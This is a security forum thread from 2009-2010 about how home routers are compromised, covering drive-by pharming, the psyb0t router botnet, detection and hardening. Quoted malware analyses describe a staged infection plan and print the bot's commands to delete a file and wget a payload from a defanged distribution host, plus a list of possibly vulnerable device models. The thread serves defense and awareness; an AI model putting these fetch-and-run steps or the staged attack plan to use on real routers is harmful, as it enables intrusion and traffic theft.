How do you compromise a router?

Searching_ _ _ · Dec 19, 2009

More worrisome than host file attacks is the compromise of a local network router.
...
An attacker could specify a DNS server under his control instead of a legitimate one. All subsequent resolutions will go through the bad server. A scenario involving malicious JavaScript that changes the router's DNS server is called Drive-By Pharming.
...
Like malware on desktop systems, a firmware replacement (on a router) can be very difficult to detect. A stealthy implementation will appear to behave the same as the manufacturer's firmware; the administration page will look the same, settings will appear correct, etc.
...
Once administrative access is granted, all of the router's settings including the firmware itself may be altered.
...
Pharming is only one of many attacks that malicious firmware can mount; others include eavesdropping, active man in the middle attacks, and traffic logging. Like misconfiguration, the entire LAN is subject to these actions.
Click to expand...

Pharming vulnerability at home

If this goes undetected in many systems, will this continue to be a launch point for reinfections?
How can you prove a router has been compromised?
What methods are used to fix a compromised router issue?

chronomatic · Dec 19, 2009

The best way is to simply avoid having it hijacked in the first place. Don't allow remote admin access, or if you do, use an ssh key and a white list of allowed IP's. This simple action will stop these attacks.

And of course, if the router supports it, it would be wise to flash it with third party open-source firmware like Tomato or DD-WRT. Although these are not bullet proof from vulns (DD-WRT had a major one a while back), the amount of options they provide as far as security usually is more than what the limited factory firmware allows.

Searching_ _ _ · Dec 20, 2009

Why Attack The Router?

Attacking the router will enable you to monitor network activity with a much higher level of stealth. As most people think the router is a dumb device which simply does NAT translation, it will not be considered a device with a high security risk. Most intrusion analysts at this time will not even consider the router as the place where the malware is hiding.
Further, most people will keep the router on 24/7. Most people shut down their PCs in the evening before they go to bed, or when they leave the office. Also, since the malware has ultimately wound up on the router, you can monitor all network traffic with a decreased likelyhood of setting off any intrusion alarms. Infact, the highest level of risk is getting the dropper onto a host PC to launch your attack against the router with.
...
Once the stage1 malware is running in RAM, one could take several strategies. The first, would be to outright bruteforce the router, trying many different shellcodes and passwords to get access. The second would be to outright ask for the router username and password if you are disguising your malware as a “network accelerator” tool.

If the stage1 malware succeds in getting a shell on the router, it should use the router to download the stage2 malware from the distribution site. The stage2 malware, being the real malware, would do whatever you wanted it to do. Ideally, it would install itself so that reinfection is not necessary. At this point, the stage1 malware should terminate itself.
...
The stage1 malware may stay
around though to ensure that the router remains infected.
...
As long as all of the problems discussed are handled, a rootkit on a NAT appliance could remain permanent, and be fully undetected.
Click to expand...

Many routers may be susceptible to attack.

Right now, most Linux-based routers ship unnecessary tools in their firmware such as wget, the busybox ftpget applet, telnet and tftp.
These programs are unnecessary for proper operation of a router and simply make it possible to enable malware like the one described in this paper. If routers had properly locked down firmware, then this attack would be much harder than it presently is.
Click to expand...

How do you detect it?

This attack can be detected by monitoring the traffic between the WAN and the router, however most people do not possess the capability of doing this.
Click to expand...

Is this theoretical or is it in use?

As of 2009, a successful “router bluepill” has been discovered by the DroneBL team and an earlier, more limited test version was discovered in December 2008 by Terry Baume. In fact, in 2009 it has gotten worse: some routers and modems themselves can be exploited from the WAN, not just the LAN. This could cause giant worms and botnet armies of routers being formed exclusively for the purpose of harvesting personally identifying information.
Click to expand...

http://nenolod.net/~nenolod/router-malware.pdf

Dregg Heda · Dec 22, 2009

Very interesting!

Searching_ _ _ · Dec 28, 2009

Am I Vulnerable?
...
Any device that meets the above criteria is vulnerable, including those built on custom firmware such as OpenWRT and DD-WRT.
Click to expand...

Commentary on "is device X vulnerable?"
Short answer: We don't know. There are so many devices out there that we could not possibly know.
Your best bet would be to take action to upgrade the device firmware and secure any passwords if there is concern that the device may be vulnerable. Such actions will help to avoid exploitation by the worm.
Click to expand...

Infection strategy
Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:
# rm -f /var/tmp/udhcpc.env
# wget
If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.
If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.
Click to expand...

http://dronebl.org/blog/8

Searching_ _ _ · Dec 29, 2009

Router malware...psyb0t

After prodding it a bit with IDA it became obvious that the new version was also packed with UPX, but apparently the guys had either read Terrys PDF or seen that they’ve been seen, so they had manually modified the binary and made all telltale signs of UPX go away. Except for the entrypoint.
...
The malware can spread itself through telnet admin interfaces of the DSL modems.
...
It also seems to have the capability to perform clickfraud on clickhype.com if the author wishes so.
...
The worst thing is that it’s possible to alter the DNS settings of all client inside the LAN through this. As well as transparently redirecting certain valuable connections into places where they shoudln’t go.
Click to expand...

botnet-running-on-mips-cpu-devices

Where are MIPS?

MIPS implementations are currently primarily used in many embedded systems such as the Series2 TiVo, Windows CE devices, Cisco routers, residential gateways, and video game consoles like the Nintendo 64 and Sony PlayStation, PlayStation 2, and PlayStation Portable handheld system.
Click to expand...

http://en.wikipedia.org/wiki/MIPS_architecture

The FiOS Actiontec MI424WR

Actiontec’s router features an advanced hardware design including an industry-first 64-bit, dual core processor. The router’s 64-bit architecture provides a substantial performance improvement over the 32-bit devices sold today. The router’s latest MIPS core offers further performance improvement and additional instructions for networking applications reducing the number of cycles needed for even greater CPU efficiency.
Click to expand...

Actiontec MI424WR Datasheet PDF

Mrkvonic · Dec 29, 2009

It all begins by not having any malware in your local network and using a strong password for your router. And that's it, basically.

As to all that mumb-jumbo pseudo hacking stuff, what if your router does not have telnet? And even if it does, you know telnet does not allow root by default?

Mrk

Page42 · Dec 29, 2009

Mrkvonic said:

It all begins by not having any malware in your local network and using a strong password for your router. And that's it, basically
Click to expand...

My router password can be up to 64 characters long. I selected one that is 34 characters, upper/lower case, alpha/numeric plus assorted characters.

Remote access is disabled also.
How do these settings look on a Linksys?

Searching_ _ _ · Dec 30, 2009

Mrkvonic said:

It all begins by not having any malware in your local network
Click to expand...

some routers and modems themselves can be exploited from the WAN, not just the LAN.
Click to expand...

https://www.wilderssecurity.com/showpost.php?p=1593370&postcount=3

Mrkvonic said:

what if your router does not have telnet?
Click to expand...

See above. Also, other services are vulnerable, check the articles, I may not have c&p'd the info.

Mrkvonic said:

using a strong password
Click to expand...

It seems to be the major commonality in all articles to reduce it's ability to root the firmware.

Page42 said:

I selected one that is 34 characters, upper/lower case, alpha/numeric plus assorted characters.
Click to expand...

Yeah, that's strong.

Possibly vulnerable to psyb0t:
A list of some devices that are Linux MIPS based.

Devices are based on the RTL8181:

* Known RTL8181-based consumer devices
* Edimax PS-1205UWg print server
* Edimax EW-7206APg
* Edimax EW-7207APb
* Edimax BR-6104WB
* Minitar MNWAPB 902.11b AccessPoint
* Minitar Hacking
* Minitar firmware sourcecode: sdk-1.4, sdk-1.6 (mirror)
* Ovislink 1120
* Planet WAP-1963A
* Planet WAP-1963
* WL-1302 / WL-1302C

Devices are based on the RTL8186:

* AP Router WR254
* Alfa Network AIP-W608H (Flash: 2MB, RAM: 16MB)
* Belkin Wireless G Router F5D7230-4 Version 9000 (Flash: ? RAM: 16MB)
* Canyon CN-WF514 (third version, FW v1.37 to v1.49)
* D-Link DWL-G700AP (Flash: 2 MB, RAM: 8 MB)
* D-Link DAP-1160 (Flash: 4 MB, RAM: 16 MB)
* Encore Wireless Lan Extender ENRXWI-G
* Edimax BR-6204Wg BR-6304Wg EW-7206APg EW-7209APg
* EnGenius EOC-3220 EOC-3220(EXT) EOC-3220+ ESR-1220
* LinkSys WMB54G
* Minitar MNWAPG and MNWAPGA
* OvisLink WL-5460AP, overview (Italian)
* Planet WRT-414, WAP-4033, WAP-4033PE, WAP-4035 - some photos available here!
* Planex BLW-54CW3
* ZyXEL P-330W (Flash: 2 MB, RAM: 16 MB). GPL Source Code here
* C-NET CWR854 Datasheet according to the REDME file of the firmware it has RTL8186 SoC (2MB Flash, 8MB RAM)
* TRENDnet TEW-430APB Datasheet (2MB Flash, 8MB RAM)
* Topcom Skyr@cer WBR 7001g Product page

Devices are based on the RTL8650/RTL8651:

* AP Router WAP354: RTL8651B
* Belkin F5D9230-4 V2000^ (V1000?): RTL8651B SoC + Airgo True MIMO chip (appears to be the same board as the Linksys WRT54GX series)
* D-Link DI-604+: RTL8650B
* D-Link DI-624M,DI-634M: RTL8651B SoC + Atheros MIMO chipset
* D-Link DI-624S: RTL8651B SoC + Atheros SuperG chipset + USB2.0 controller
* D-Link DI-604UP, DI-524UP: RTL8650B SoC More
* D-Link DIR-120: RTL8650B SoC
* D-Link DIR-300: RTL8650B SoC
* Edimax BR-6214K, RTL8650B SoC
* Linksys BEFSR41 v4: RTL8650B
* Linksys WAP54GX V1.0: RTL8651B SoC + Airgo True MIMO chip
* Linksys WRT54GX2 V1.0: RTL8651B SoC + Airgo True MIMO chip
* Linksys WRT54GX V2.0: RTL8651B SoC + Airgo True MIMO chip
* Linksys WRV200: RTL8651B SoC
* Netgear RP614v4: RTL8650B SoC
* Netgear WPNT834
* Sitecom WL-173: RTL8650B SoC
Click to expand...

http://www.linux-mips.org/wiki/Realtek_SOC

It appears that psyb0t is mips specific. Routers and modems that use ARM processors are not vulnerable to this malware sample.
Is it only a matter of time before an ARM version that attacks routers becomes public?
There is at least one bot for the ARM processor, ikee.b botnet affects ARM based iphones, is a worm with C&C.
The router is our gateway to the internet. The average user is busy trying to overcome fakealert, smitfraud, popups and various other infectors.
Most need the help of a tech to help clean their system, so a rootkit on a router would make the router the malware dropper and almost invisible to them. If the router isn't ruled out as being infected during a malware clean up process, then after, the user is a good little user, will still get reinfected or identity stolen.

Mrkvonic · Dec 30, 2009

To get your firmware flashed, you need to execute code.
If you don't, it don't happen ... As simple as that.
Mrk

Searching_ _ _ · Dec 30, 2009

You're right.
For the firmware to get flashed, malware needs admin access on the infected router. If the malware can not guess your router password, it can not flash the firmware.
The malware can still operate on the router though, eavesdropping, traffic logging and MITM you. This can be overcome by VPN, like what Xerobank offers.
The only issue left is logging in to the router while it is infected and details being captured.
What part does the browser play in this since that is the vehicle to the log in session?

Searching_ _ _ · Dec 31, 2009

Posted by: Master Guru
I would like to save the present router firmware first, to preserve the traces of the malware, if it is indeed present.
...
I am willing to try to run Snort from the WAN side of the router, but I have no idea how?

Posted by: Hal
You just plug an Ethernet switch in on the WAN port, and connect your broadband modem, router, and computer.
...
simply being on the same Ethernet segment can work, depending on the sniffing software.
Click to expand...

routers_potential_malware_infection

I would like to save the present router firmware first, to preserve the traces of the malware, if it is indeed present also, but how?

Can I do a memory dump from a running router or modem?

Can anyone explain in more detail what Hal suggested about the setup of the devices?

Since modems are also capable of being infected, how do I scan/sniff from the cable side with it's WTF-connector?

If my firmware is infected and I can't upgrade the firmware through the router what can I do?

Searching_ _ _ · Jan 9, 2010

Instead of installing malware that continues to run like a key logger or trojan, malicious programs are increasingly attacking the network router which is common with any internet connected home and/or office. An unwanted program can quickly make a change to your router settings that will immediately open all your computers to the world. The bad guys won’t have to install a key logger, they’ll be able to record every byte that goes across your network.
...
As a security professional I’m reading more and more about vulnerabilities being found in wireless and non-wireless routers. There’s only so much we all can do but the first thing should be to change the default password.
Click to expand...

Bits fromBill

acuariano · Jan 9, 2010

hey searching great post.
now changing the default password.
-how often?.
-password..regular password or strong passwords?..lenght?
-also usernames?..

Searching_ _ _ · Jan 9, 2010

This might answer your question by consensus.
https://www.wilderssecurity.com/showthread.php?t=248673
I try to use 20+ on very important stuff. The router has been recently added to "very important stuff".
I was very careless about security, not sure what I was thinking. Now I hope that no one gets pwned.

Another article, though not new news.

DNS Pharming using Rogue DHCP

The “Unauthorized DHCP Servers” attack is the main topic of this blog, and the real (bad) news is that today we found malicious code in the wild that actively uses this attack, with the aim of hijacking the DNS configurations of other machines on the same local network. The malicious code is named Trojan.Flush.M.
The idea is simple and evil at the same time: a Trojan installed on an infected machine runs a rogue DHCP server on the local network and serves bogus DHCP packets to other machines when they request a new IP configuration. If the Trojan is fast enough in sending out these DHCP packets, with some luck it can modify the network configuration of other computers.
Click to expand...

http://www.symantec.com/connect/blogs/dns-pharming-attacks-using-rogue-dhcp

I know this malware is not designed to attack a router. DNS and DHCP are what point you every where you have to go with a computer. If that were compromised at the router, it would be a potent combination.

hmmm...-----< Trojan router.flush.m >

Searching_ _ _ · Jan 10, 2010

After a process of elimination, I got down to shutting everything off on the local network except the router, and found that it was still actively interacting with the internet. I know that it did not behave that way long ago, so either the network protocols have changed, or the router is behaving in a new way.
Click to expand...

The poster believes it is possible his router is infected, but unsure because of lack of networking knowledge. His main symptom, lots of traffic when their should be little to none.

BEFSR41 Ver 2 taken over by Malware?

Also included is a how to set up to scan the wan and lan to diagnose if a malicious issue is occurring.

Log in or Sign up

How do you compromise a router?

Searching_ _ _ Registered Member

chronomatic Registered Member

Searching_ _ _ Registered Member

Dregg Heda Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Mrkvonic Linux Systems Expert

Page42 Registered Member

Attached Files:

Router settings.jpg

Searching_ _ _ Registered Member

Mrkvonic Linux Systems Expert

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

acuariano Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Log in or Sign up

How do you compromise a router?

Searching_ _ _ Registered Member

chronomatic Registered Member

Searching_ _ _ Registered Member

Dregg Heda Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Mrkvonic Linux Systems Expert

Page42 Registered Member

Attached Files:

Router settings.jpg

Searching_ _ _ Registered Member

Mrkvonic Linux Systems Expert

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

acuariano Registered Member

Searching_ _ _ Registered Member

Searching_ _ _ Registered Member

Useful Searches